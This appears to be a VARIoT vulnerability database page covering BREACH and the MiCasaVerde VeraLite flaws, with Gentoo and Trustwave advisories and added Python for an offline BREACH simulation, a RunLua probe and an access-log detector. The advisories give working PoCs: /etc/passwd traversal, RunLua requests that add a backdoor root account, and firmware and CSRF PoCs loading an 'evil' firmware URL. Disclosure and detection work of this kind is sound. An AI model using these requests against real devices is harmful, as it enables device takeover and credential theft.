VARIoT IoT vulnerabilities database
| VAR-202002-0569 | CVE-2013-3587 | BREACH vulnerability in compressed HTTPS |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929.
By observing the lengths of compressed HTTPS responses, an attacker can guess secrets (website authentication keys, CSRF tokens, etc.) carried in the encrypted stream. Angelo Prado of Salesforce.com reports as follows:
* Extending the CRIME vulnerability presented at Ekoparty 2012, an attacker can target HTTPS responses to recover data from the response body.
* While the CRIME attack is currently believed to be mitigated by disabling TLS/SSL-level compression, compressed HTTP responses represent a significant unmitigated vector which is currently exploitable. By injecting plaintext into an HTTPS request, an attacker can learn information about the corresponding HTTPS response by measuring its size.
* This relies on the attacker being able to observe the size of the cipher text received by the browser while triggering a number of strategically crafted requests to a target site. To recover a particular secret in an HTTPS response body, the attacker guesses character by character, sending a pair of requests for each guess. The correct guess will result in a smaller HTTPS response. For each guess the attacker coerces the victim's browser to issue two requests. The first request includes a payload of the form: "target_secret_name=<already known part of secret>+<guess>+<padding>" ...while the second request includes a payload of the form: "target_secret_name=<already known part of secret>+<padding>+<guess>".
* If the size of the first response is smaller than the second response, this indicates that the guess has a good chance of being correct. This method of sending two similar requests and comparing them is due to Duong and Rizzo. If multiple candidates are found, the following is a useful recovery mechanism: move forward in parallel with both candidates until it becomes clear which guess is correct.
* With a token of length 32 and a character space of size 16 (e.g. hex), the attacker needs an average of approximately 1,000 requests if no recovery mechanisms are needed. In practice, we have been able to recover CSRF tokens with fewer than 4,000 requests. A browser like Google Chrome or Internet Explorer is able to issue this number of requests in under 30 seconds, including callbacks to the attacker command & control center.
[In order to conduct the attack, the following conditions must be true]:
* 1. HTTPS-enabled endpoint (ideally with stream ciphers like RC4, although the attack can be made to work with adaptive padding for block ciphers).
* 2. The attacker must be able to measure the size of HTTPS responses.
* 3. Use of HTTP-level compression (e.g. gzip).
* 4. A request parameter that is reflected in the response body.
* 5. A static secret in the body (e.g. CSRF token, sessionId, VIEWSTATE, PII, etc.) that can be bootstrapped (either the first/last two characters are predictable and/or the secret is padded with something like KnownSecretVariableName="").
* 6. An otherwise static or relatively static response. Dynamic pages do not defeat the attack, but make it much more expensive.
A remote third party may thus obtain secrets such as the website's CSRF tokens from an encrypted HTTPS response. The TLS protocol is prone to an information-disclosure vulnerability. A man-in-the-middle attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. HTTPS (Hypertext Transfer Protocol Secure) is a network security transmission protocol which carries HTTP over a computer network and uses SSL/TLS to encrypt the data. The main purpose of HTTPS is to authenticate web servers and to protect the privacy and integrity of the exchanged data. There is an information disclosure vulnerability in the HTTPS protocol, which stems from the fact that the length of the encrypted data is not obfuscated when compressed data is encrypted.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201606-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: nginx: Multiple vulnerabilities
Date: June 17, 2016
Bugs: #560854, #573046, #584744
ID: 201606-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in nginx, the worst of which
may allow a remote attacker to cause a Denial of Service.
Background
==========
nginx is a robust, small, and high performance HTTP and reverse proxy
server.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-servers/nginx < 1.10.1 >= 1.10.1
Description
===========
Multiple vulnerabilities have been discovered in nginx. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly cause a Denial of Service condition
via a crafted packet.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All nginx users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/nginx-1.10.1"
References
==========
[ 1 ] CVE-2013-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3587
[ 2 ] CVE-2016-0742
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0742
[ 3 ] CVE-2016-0746
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0746
[ 4 ] CVE-2016-0747
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0747
[ 5 ] CVE-2016-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-06
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
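The two-request, character-by-character recovery that Prado describes above, as an added example written for this page (it is not code from the report, from Gentoo or from nginx). A constructed page carries an 8-character hex CSRF token (assumed value 3f9a1c7e) and reflects a query parameter without escaping it; the "attacker" sees nothing but the gzip-compressed length of the body, which is exactly what a passive observer of a stream-cipher or AEAD TLS connection sees. One assumption makes the oracle deterministic: the compressor is pinned to DEFLATE's static Huffman table (zlib's Z_FIXED strategy), so every ASCII literal costs 8 bits and one more byte absorbed into an LZ77 match shrinks the output by exactly one byte. Real servers use dynamic tables, which blur that one-byte signal; that is one reason real recoveries need more requests than the ideal count.

```python
"""BREACH, offline: a compression side channel against a constructed page.

No TLS and no network are involved. The attacker only ever learns the
length of the compressed response, as a network observer would.
"""
import zlib
from typing import List, Optional

# ---- constructed victim (assumptions, not a real site) ----------------------
SECRET_TOKEN = "3f9a1c7e"        # assumed: an 8-character hex CSRF token
ALPHABET = "0123456789abcdef"    # character space of size 16, as in the report


class Victim:
    """Serves a page that carries a static secret and reflects a request
    parameter, gzip-compresses it, and reveals only the compressed length."""

    def __init__(self) -> None:
        self.requests = 0  # how many responses the attacker had to measure

    def page(self, reflected: str) -> bytes:
        # The reflected value is not escaped: the attack needs the canary bytes
        # to land in the body verbatim, right next to the secret's own context.
        return (
            "<html><head><title>Search</title></head><body>\n"
            '<form action="/search">'
            f'<input type="hidden" name="csrf" value="{SECRET_TOKEN}">'
            '<input type="text" name="q"></form>\n'
            f"<p>No results for: {reflected}</p>\n"
            "</body></html>\n"
        ).encode()

    def response_length(self, reflected: str) -> int:
        self.requests += 1
        # Z_FIXED selects DEFLATE's static Huffman table (assumption for the
        # demo): ASCII literals cost exactly 8 bits, so a guess that extends the
        # LZ77 match by one byte makes the output exactly one byte shorter.
        comp = zlib.compressobj(9, zlib.DEFLATED, 31, 8, zlib.Z_FIXED)  # wbits 31 = gzip
        return len(comp.compress(self.page(reflected)) + comp.flush())


# ---- attacker -----------------------------------------------------------------
CANARY = 'name="csrf" value="'  # text known to sit immediately before the secret
PAD = "{}|~^[]"                 # bytes absent from the page, so they never extend a match


def two_request_score(victim: Victim, known: str, guess: str) -> int:
    """Duong/Rizzo comparison: both requests carry the same bytes, only the
    order differs, so only a guess that extends the LZ77 match can make the
    first response shorter than the second."""
    first = victim.response_length(CANARY + known + guess + PAD)
    second = victim.response_length(CANARY + known + PAD + guess)
    return first - second  # negative: the guess is (very probably) right


def recover_token(victim: Victim, token_len: int) -> Optional[str]:
    """Recover the secret one character at a time. When several guesses score,
    follow each in parallel (depth-first) until one reaches the full length;
    a wrong branch dies because none of its extensions ever scores."""

    def extend(known: str) -> Optional[str]:
        if len(known) == token_len:
            return known
        candidates: List[str] = [
            g for g in ALPHABET if two_request_score(victim, known, g) < 0
        ]
        for g in candidates:
            hit = extend(known + g)
            if hit is not None:
                return hit
        return None

    return extend("")


if __name__ == "__main__":
    v = Victim()
    print("recovered:", recover_token(v, len(SECRET_TOKEN)), "requests:", v.requests)
```

With an 8-character token the run costs 8 x 16 x 2 = 256 measured responses, the same arithmetic behind the report's figure of roughly 1,000 requests for a 32-character token. The depth-first fallback in recover_token is the "move forward in parallel" recovery mechanism from the report; with the static Huffman table it never has to branch.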
| VAR-202001-1147 | CVE-2013-4861 |
Mi Casa Verde VeraLite Directory Traversal Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201308-0135, VAR-E-201308-0134 |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Directory traversal vulnerability in cgi-bin/cmh/get_file.sh in MiCasaVerde VeraLite with firmware 1.5.408 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the filename parameter. MiCasaVerde VeraLite contains a path traversal vulnerability; information may be obtained. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A directory traversal vulnerability exists in Mi Casa Verde VeraLite. Because the program fails to properly filter user-submitted input, a remote attacker can send a specially crafted request containing directory traversal sequences ('../') to retrieve arbitrary files in the context of the affected device, including information that helps to launch further attacks.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2013-019:
Multiple Vulnerabilities in MiCasaVerde VeraLite
Published: 08/01/13
Version: 1.0
Vendor: MiCasaVerde (http://www.micasaverde.com/)
Product: VeraLite
Version affected: 1.5.408
Product description:
The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product
which centralizes control over home automation devices such as door locks,
window blinds, security cameras, smoke detectors, HVAC systems, lights,
etc.
Finding 1: Path Traversal
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4861
CWE: CWE-23
The VeraLite has a path traversal vulnerability allowing for disclosure of
arbitrary files. This allows an attacker to retrieve the contents of any
file on the system such as the /etc/passwd file which contains the hashed
root password as well as the tech support remote access password if remote
access has been configured.
A proof of concept can be run against a VeraLite by using the following URL:
GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd
On a newly unboxed VeraLite, this shouldn't work as the first part of the
path used by the script doesn't exist, but the directory which must exist
for exploitation to work correctly can be created by using the
store_file.sh script, like so:
GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test
This attack can also be launched through the Internet-based control panel
at cp.mios.com when logged in as either an admin or guest level account.
Finding 2: Insufficient Authorization Checks
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4862
CWE: CWE-285
The VeraLite makes a distinction between Administrator and Guest users such
that Guest users should not be able to make changes to the configuration of
the system. There are several functionalities included in the VeraLite
console available to Guest level users which can be used to escalate
privileges.
A) Firmware update - This allows a guest to push custom firmware to the
unit and can allow for full compromise of the device.
A proof of concept can be seen using the following URL:
GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs
B) Settings backup - This allows a guest to obtain copies of various
sensitive files, including the lighttpd.users file which contains hashed
cp.mios.com passwords, and the passwd file which contains the hashed root
password.
GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1
C) Test Luup code (Lua) - This allows a guest to run Lua code on the
VeraLite as root. A backdoor account can be added with the following POST
request:
POST /port_49451/upnp/control/hag HTTP/1.1
Host: A.B.C.D
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: text/xml;charset=UTF-8
MIME-Version: 1.0
SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")</Code> </u:RunLua></s:Body></s:Envelope>
Finding 3: Insufficient Authentication Checks
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4863
CWE: CWE-287
The VeraLite exposes UPnP functionality which allows for Lua code to be run
as root from the LAN without authentication using the RunLua action in the
HomeAutomationGateway service of the HomeAutomationGateway device. A
backdoor account can be added with the following POST request to port
49451:
POST /upnp/control/hag HTTP/1.1
Host: A.B.C.D:49451
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: text/xml;charset=UTF-8
MIME-Version: 1.0
SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")</Code> </u:RunLua></s:Body></s:Envelope>
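A request builder for the RunLua action used in findings 2C and 3, as an added example (it is not Trustwave's tooling): it produces the same SOAP envelope as the PoCs above but with a harmless payload, XML-escapes the Lua (the PoCs sidestep XML escaping by %-encoding the shell metacharacters instead), and computes Content-Length from the body rather than copying the figure printed in the PoC. The unauthenticated variant can be sent to tcp/49451 to confirm finding 3 on a device you own. Two things are assumptions: that luup.log is available as the Luup logging call on this firmware, and that an HTTP 200 status means the action was accepted, since the advisory does not show the device's response.

```python
"""RunLua request builder and probe for TWSL2013-019 findings 2C and 3.

Added example, not Trustwave's tooling. Only point it at devices you own.
"""
import re
import socket
from typing import Dict, Optional, Tuple
from xml.sax.saxutils import escape

HAG_SERVICE = "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"

# Harmless payload. Assumption: luup.log is the Luup logging call on this
# firmware; it is used because its only effect is a line in the device log.
PROBE_LUA = 'luup.log("TWSL2013-019 RunLua probe")'


def build_runlua_request(host: str, lua_code: str, via_web_console: bool = False) -> bytes:
    """Raw HTTP request carrying a RunLua action.

    via_web_console=False: finding 3, straight to the UPnP port, no credentials.
    via_web_console=True:  finding 2C, the web console's /port_49451/ prefix on
                           port 80, which needs a guest or admin session
                           (add the session cookie to the headers yourself).
    """
    envelope = (
        '<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
        'xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        f'<u:RunLua xmlns:u="{HAG_SERVICE}"><DeviceNum></DeviceNum>'
        # The Lua is XML-escaped here; the advisory's PoC avoids the issue by
        # %-encoding the shell metacharacters instead.
        f"<Code>{escape(lua_code)}</Code></u:RunLua></s:Body></s:Envelope>"
    ).encode()
    if via_web_console:
        path, host_header = "/port_49451/upnp/control/hag", host
    else:
        path, host_header = "/upnp/control/hag", f"{host}:49451"
    head = "\r\n".join([
        f"POST {path} HTTP/1.1",
        f"Host: {host_header}",
        "Content-Type: text/xml;charset=UTF-8",
        f'SOAPACTION: "{HAG_SERVICE}#RunLua"',
        f"Content-Length: {len(envelope)}",  # computed from the body, never copied
        "Connection: close",
    ])
    return head.encode() + b"\r\n\r\n" + envelope


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a request into request line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode().split("\r\n")
    headers: Dict[str, str] = {}
    for h in lines[1:]:
        name, value = h.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def probe(host: str, timeout: float = 5.0) -> Optional[int]:
    """Send the unauthenticated probe to tcp/49451 and return the HTTP status
    code, or None if the port is closed or filtered. The advisory shows no
    response body, so only the status line is read: a 200 with no credentials
    means the gateway ran caller-supplied Lua (finding 3)."""
    try:
        with socket.create_connection((host, 49451), timeout=timeout) as sock:
            sock.sendall(build_runlua_request(host, PROBE_LUA))
            status_line = sock.recv(1024).split(b"\r\n", 1)[0].decode(errors="replace")
    except OSError:
        return None
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    print(build_runlua_request("192.0.2.10", PROBE_LUA).decode())
```

The same builder with via_web_console=True reproduces the finding 2C path; a device that answers the unauthenticated variant from an arbitrary LAN host is exposed regardless of how the web console's Guest/Administrator roles are configured.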
Finding 4: Server-Side Request Forgery
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4864
CWE: CWE-918
The VeraLite will make HTTP requests on behalf of a user using the
/cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of
trustwave.com is as follows:
GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com
This allows an attacker to bypass firewall controls and use the VeraLite as a proxy.
Finding 5: Cross-Site Request Forgery
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4865
CWE: CWE-352
The VeraLite does not implement any defense against cross-site request
forgery. A proof of concept as seen below can cause a Vera user to update
their firmware using a custom firmware URL:
<html>
<body>
<iframe src="http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs" width="1" height="1">
</iframe>
</body>
</html>
If this PoC was embedded in any web page a targeted user visited, an
attacker would be able to make arbitrary changes to the firmware on the
device, allowing the potential for remote root access.
Vendor Response:
"...the "vulnerabilities" you referred to were deliberate design decisions
because that's what the customers in this particular channel (ie Vera
retail) want. As you can see we have an open forum to discuss this, and
very people object to leaving Vera open. So we are not able to lock down
the gateway, and effectively break the systems of many customers who rely
on the open system to run their own scripts and plugins."
Remediation Steps:
No official patch is available. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of access control lists and proper
network segmentation.
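Until network access is restricted, the findings above can at least be spotted in the web server's access log. The following is an added example, not part of the advisory, run over constructed lighttpd-style combined-format lines (the lighttpd.users file named in finding 2B indicates lighttpd; whether the device actually writes an access log in this format is an assumption). It flags findings 1, 2A/5, 2B, 2C and 4 by path and query string after percent-decoding, so that encoded dot-dot sequences are caught too, and treats any upgrade_step2.sh squashfs URL outside a placeholder allow list as hostile. Finding 3 talks to tcp/49451 directly and never touches the web server, so it has to be watched on the network (flow logs or a capture filter on that port), not here.

```python
"""Spot the TWSL2013-019 attack patterns in web server access logs.

Added example with constructed log lines; not Trustwave's or the vendor's code.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format. Whether the VeraLite's lighttpd writes an access log in
# this format is an assumption; adjust the pattern to the real format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Placeholder allow list: replace with the host legitimate firmware comes from.
TRUSTED_FIRMWARE_HOSTS = {"firmware.example.net"}


def classify(method: str, target: str) -> List[str]:
    """Return the advisory findings one request matches (possibly several)."""
    url = urlsplit(target)
    path = unquote(url.path)
    # parse_qs percent-decodes once; the extra unquote catches double encoding.
    qs: Dict[str, List[str]] = {
        k: [unquote(v) for v in vs]
        for k, vs in parse_qs(url.query, keep_blank_values=True).items()
    }
    hits: List[str] = []
    if path.endswith("/cgi-bin/cmh/get_file.sh") and any(".." in v for v in qs.get("filename", [])):
        hits.append("F1 path traversal via get_file.sh")
    if path.endswith("/cgi-bin/cmh/store_file.sh"):
        hits.append("F1 precursor: store_file.sh creates the directory the traversal needs")
    if path.endswith("/upgrade_step2.sh"):
        for fw_url in qs.get("squashfs", []):
            if (urlsplit(fw_url).hostname or "") not in TRUSTED_FIRMWARE_HOSTS:
                hits.append("F2A/F5 firmware upgrade from untrusted URL")
    if path.endswith("/cgi-bin/cmh/backup.sh") and qs.get("external") == ["1"]:
        hits.append("F2B settings backup exposing password hashes")
    if method == "POST" and path.endswith("/port_49451/upnp/control/hag"):
        hits.append("F2C RunLua through the web console")
    if path.endswith("/cgi-bin/cmh/proxy.sh") and "url" in qs:
        hits.append("F4 SSRF via proxy.sh")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(client ip, request target, findings) for every line that matches a rule."""
    flagged: List[Tuple[str, str, List[str]]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = classify(m["method"], m["target"])
        if hits:
            flagged.append((m["ip"], m["target"], hits))
    return flagged


# Constructed sample log: a benign client (10.0.0.5) and an attacker (203.0.113.7).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2013:10:00:01 +0000] "GET /cgi-bin/cmh/store_file.sh?store_file=test HTTP/1.1" 200 12 "-" "curl/7.30"
203.0.113.7 - - [01/Aug/2013:10:00:02 +0000] "GET /cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd HTTP/1.1" 200 812 "-" "curl/7.30"
203.0.113.7 - - [01/Aug/2013:10:00:03 +0000] "GET /cgi-bin/cmh/get_file.sh?filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 812 "-" "curl/7.30"
10.0.0.5 - - [01/Aug/2013:10:05:00 +0000] "GET /cgi-bin/cmh/get_file.sh?filename=scene.json HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2013:10:06:00 +0000] "GET /upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs HTTP/1.1" 200 0 "-" "curl/7.30"
10.0.0.5 - - [01/Aug/2013:10:07:00 +0000] "GET /upgrade_step2.sh?squashfs=http://firmware.example.net/vera.squashfs HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2013:10:08:00 +0000] "GET /cgi-bin/cmh/backup.sh?external=1 HTTP/1.1" 200 51200 "-" "curl/7.30"
203.0.113.7 - - [01/Aug/2013:10:09:00 +0000] "POST /port_49451/upnp/control/hag HTTP/1.1" 200 230 "-" "curl/7.30"
203.0.113.7 - - [01/Aug/2013:10:10:00 +0000] "GET /cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com HTTP/1.1" 200 9000 "-" "curl/7.30"
""".splitlines()

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(hits))
```

Because the device's own roles cannot be trusted (finding 2), the useful pivot is the client address: every flagged line from an address outside the management ACL is a policy violation as well as an attack indicator.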
Revision History:
04/23/13 - Vulnerability disclosed to vendor
06/04/13 - Vendor confirms they will not fix
08/01/13 - Advisory published
References
1. http://www.micasaverde.com/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
| VAR-202001-1149 | CVE-2013-4863 |
Mi Casa Verde VeraLite Remote Authentication Bypass Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201308-0135, VAR-E-201308-0134 |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
The HomeAutomationGateway service in MiCasaVerde VeraLite with firmware 1.5.408 allows (1) remote attackers to execute arbitrary Lua code via a RunLua action in a request to upnp/control/hag on port 49451 or (2) remote authenticated users to execute arbitrary Lua code via a RunLua action in a request to port_49451/upnp/control/hag. MiCasaVerde VeraLite contains an authentication vulnerability; information may be acquired or falsified, and a denial of service (DoS) condition may result. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A remote authentication bypass vulnerability exists in Mi Casa Verde VeraLite. An attacker could exploit the vulnerability to bypass the authentication mechanism and gain unauthorized access to the affected device, which may lead to further attacks. The full text of Trustwave SpiderLabs Security Advisory TWSL2013-019 (this issue is its Finding 3) is reproduced above under VAR-202001-1147 / CVE-2013-4861.
| VAR-202001-1148 | CVE-2013-4862 |
MiCasaVerde VeraLite Firmware vulnerable to unauthorized authentication
Related entries in the VARIoT exploits database: VAR-E-201308-0135, VAR-E-201308-0134 |
CVSS V2: 5.5 CVSS V3: 8.1 Severity: HIGH |
MiCasaVerde VeraLite with firmware 1.5.408 does not properly restrict access, which allows remote authenticated users to (1) update the firmware via the squashfs parameter to upgrade_step2.sh or (2) obtain hashed passwords via the cgi-bin/cmh/backup.sh page. MiCasaVerde VeraLite contains an improper authorization vulnerability; information may be obtained and altered. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. Multiple privilege escalation and information disclosure vulnerabilities exist in Mi Casa Verde VeraLite. An attacker can exploit them to gain elevated privileges and unauthorized access to sensitive information. Trustwave SpiderLabs Security Advisory TWSL2013-019:
Multiple Vulnerabilities in MiCasaVerde VeraLite
Published: 08/01/13
Version: 1.0
Vendor: MiCasaVerde (http://www.micasaverde.com/)
Product: VeraLite
Version affected: 1.5.408
Product description:
The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product
which centralizes control over home automation devices such as door locks,
window blinds, security cameras, smoke detectors, HVAC systems, lights,
etc.
Finding 1: Path Traversal
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4861
CWE: CWE-23
The VeraLite has a path traversal vulnerability allowing for disclosure of
arbitrary files.
A proof of concept can be run against a VeraLite by using the following URL:
GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd
On a newly unboxed VeraLite, this shouldn't work as the first part of the
path used by the script doesn't exist, but the directory which must exist
for exploitation to work correctly can be created by using the
store_file.sh script, like so:
GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test
This attack can also be launched through the Internet-based control panel
at cp.mios.com when logged in as either an admin or guest level account.
Finding 2: Insufficient Authorization Checks
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4862
CWE: CWE-285
The VeraLite makes a distinction between Administrator and Guest users such
that Guest users should not be able to make changes to the configuration of
the system. There are several functionalities included in the VeraLite
console available to Guest level users which can be used to escalate
privileges.
A) Firmware update - This allows a guest to push custom firmware to the
unit and can allow for full compromise of the device.
A proof of concept can be seen using the following URL:
GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs
B) Settings backup - This allows a guest to obtain copies of various
sensitive files, including the lighttpd.users file which contains hashed
cp.mios.com passwords, and the passwd file which contains the hashed root
password.
GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1
C) Test Luup code (Lua) - This allows a guest to run Lua code on the
VeraLite as root. A backdoor account can be added with the following POST
request:
POST /port_49451/upnp/control/hag HTTP/1.1
Host: A.B.C.D
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: text/xml;charset=UTF-8
MIME-Version: 1.0
SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")</Code> </u:RunLua></s:Body></s:Envelope>
Finding 3: Insufficient Authentication Checks
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4863
CWE: CWE-287
The VeraLite exposes UPnP functionality which allows for Lua code to be run
as root from the LAN without authentication using the RunLua action in the
HomeAutomationGateway service of the HomeAutomationGateway device. A
backdoor account can be added with the following POST request to port
49451:
POST /upnp/control/hag HTTP/1.1
Host: A.B.C.D:49451
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
